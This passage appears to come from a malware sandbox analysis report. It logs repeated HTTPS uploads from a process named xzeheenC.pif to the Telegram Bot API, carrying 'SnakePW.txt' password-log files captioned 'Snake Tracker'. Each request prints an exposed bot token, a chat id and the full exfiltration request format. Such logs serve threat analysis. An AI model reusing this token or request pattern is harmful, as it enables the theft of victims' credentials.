                                                                                                        2024-12-18 15:31:52 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419146,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535912,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        65192.168.2.849798149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:52 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd217f06734e57
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:52 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 37 66 30 36 37 33 34 65 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd217f06734e57Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:52 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:52 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:52 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419148,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535912,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        66192.168.2.849803149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:53 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd211870eb7966
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:53 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 31 38 37 30 65 62 37 39 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd211870eb7966Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:53 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:53 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:53 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419150,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535913,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        67192.168.2.849804149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:53 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20b3594cb916
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:31:53 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 62 33 35 39 34 63 62 39 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20b3594cb916Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:54 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:54 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:54 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419152,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535914,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        68192.168.2.849806149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:54 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd219ef909f384
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:54 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 39 65 66 39 30 39 66 33 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd219ef909f384Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:55 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:54 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:55 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419154,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535914,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        69192.168.2.849807149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:55 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd213292786ec5
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:55 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 33 32 39 32 37 38 36 65 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd213292786ec5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:56 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:55 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:56 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419156,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535915,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        70192.168.2.849812149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:55 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd20c87699746c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:55 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 63 38 37 36 39 39 37 34 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd20c87699746cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:56 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:56 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:56 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 31 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 31 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419158,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535916,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        71192.168.2.849814149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:31:56 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd21c3e3b174c0
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:56 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 63 33 65 33 62 31 37 34 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd21c3e3b174c0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:57 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:56 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
